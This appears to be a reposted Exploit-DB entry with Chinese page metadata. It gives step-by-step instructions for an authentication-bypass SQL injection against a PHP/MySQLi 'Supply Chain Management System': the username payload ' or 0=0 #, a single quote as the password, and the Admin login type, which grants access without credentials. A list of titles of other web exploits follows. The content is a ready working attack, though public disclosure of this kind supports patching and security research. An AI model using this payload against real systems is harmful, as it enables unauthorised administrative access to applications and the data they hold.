Supply Chain Management System – Auth Bypass SQL Injection

Exploit Database
38 阅读

作者： Piyush Malviya

日期： 2020-12-11
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/49239/

# Exploit Title: Supply Chain Management System - Auth Bypass SQL Injection
# Date: 2020-12-11
# Exploit Author: Piyush Malviya
# Vendor Homepage: https://www.sourcecodester.com/php/14619/supply-chain-management-system-phpmysqli-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14619&title=Supply+Chain+Management+System+in+PHP%2FMySQLi+with+Full+Source+Code
# Tested On: Windows 10 Pro Build 18363.1256 + XAMPP V3.2.4

#Vulnerable Page: Login Page

#Exploit
Open the Application
check the URL: http://localhost/scm-master/


Open Login Page
Enter username: ' or 0=0 #
Enter password: '
Select Login Type: Admin

click on login
The SQL payload gets executed and authentication is bypassed successfully

last Exploits
Supply Chain Management System – Auth Bypass SQL Injection的更多信息

LetoDms 1.4.x – ‘lang’ Local File Inclusion：
Employee Management System v1 – ’email’ SQL Injection：
Zeeways Adserver – Multiple Vulnerabilities：
FortiManager 5.2.2 – Persistent Cross-Site Scripting：
phpEventCalendar 0.2.3 – Multiple Vulnerabilities：
Joomla! Component KissGallery 1.0.0 – SQL Injection：
Cornerstone CMS – SQL Injection：
Online Classified System Script – SQL Injection / Cross-Site Scripting：